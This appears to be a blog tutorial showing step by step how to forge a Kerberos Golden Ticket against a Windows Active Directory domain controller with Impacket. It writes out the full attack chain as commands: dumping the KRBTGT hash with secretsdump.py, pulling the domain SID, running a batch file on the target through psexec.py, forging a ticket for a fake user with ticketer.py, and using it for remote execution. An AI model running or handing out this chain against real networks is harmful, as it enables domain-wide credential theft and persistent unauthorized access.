I wanted to know how to create a Golden Ticket and in my pursuit to find an answer I came across many ways to do this. I found most techniques used several tools and took more work than I'd prefer. After all I am a developer for a reason, I'm lazy! Here I will attempt to show how I do it the easy way using Impacket.
- Windows Active Directory Domain Controler
This attack takes advantage of some of the features in Active Directory. This being said an Active Directory Domain Controler is needed for this to work.
Creating a Golden Ticket is made simple with the help of Impacket. Impacket is a suite of tools that any hacker should familiarize herself/himself with. The easiest way to get started with Impacket is to create a docker image. For more information on that check out my blog post impacket and docker.
For creating a Golden Ticket we are only concerned with the following tools.
Create a Golden Ticket
To create a Golden Ticket the NT Hash for KRBTGT will need to be aquired as well as the Domain SID.
All this can easily be done with Impacket.
KRBTGT NT Hash
Lets start off by getting the KRBTGT hash. The following script will write our desired information to
a file called win2016 in the ~/ directory.
secretsdump.py Administrator:email@example.com | grep krbtgt | grep ::: > ~/win2016; cat ~/win2016
To get the domain SID use lookupsid.py and grep to filter out just the information needed.
Again that information is writen to the win2016 file.
lookupsid.py Administrator:firstname.lastname@example.org | grep "Domain SID" >> ~/win2016; cat ~/win2016
There are times when we forget which domain we are on. To limit errors we will not assume the domain name but rather
get it from the machine.
echo "powershell Get-WmiObject Win32_ComputerSystem" > ~/GetDomain.bat
Now execute this bat file on the target.
psexec.py Administrator:email@example.com -c ~/GetDomain.bat | grep Domain >> ~/win2016; cat ~/win2016
With all the nessassary data create a ticket.
ticketer.py -nthash 4031b5ae4b9defa1f411f26610493e0c -domain-sid S-1-5-21-126282473-2140987555-3925513934 -domain Win2016.local baduser Impacket v0.9.17-dev - Copyright 2002-2018 Core Security Technologies [*] Creating basic skeleton ticket and PAC Infos [*] Customizing ticket for Win2016.local/baduser [*] PAC_LOGON_INFO [*] PAC_CLIENT_INFO_TYPE [*] EncTicketPart [*] EncAsRepPart [*] Signing/Encrypting final ticket [*] PAC_SERVER_CHECKSUM [*] PAC_PRIVSVR_CHECKSUM [*] EncTicketPart [*] EncASRepPart [*] Saving ticket in baduser.ccache
Use the Ticket
To use the ticket with psexec.py the ticket needs to be exported.
Export the Ticket
The ticket will need to be exported to be able to use it with psexec.py.
echo "export KRB5CCNAME=/vagrant/docs/baduser.ccache" >> ~/.bashrc . ~/.bashrc tail ~/.bashrc
Use the Ticket With Psexec
Below we use the ticket against Win2016.
export KRB5CCNAME=/vagrant/docs/baduser.ccache; psexec.py -dc-ip 192.168.64.133 -target-ip 192.168.64.133 -no-pass -k Win2016.local/baduser@Win2016.Win2016.local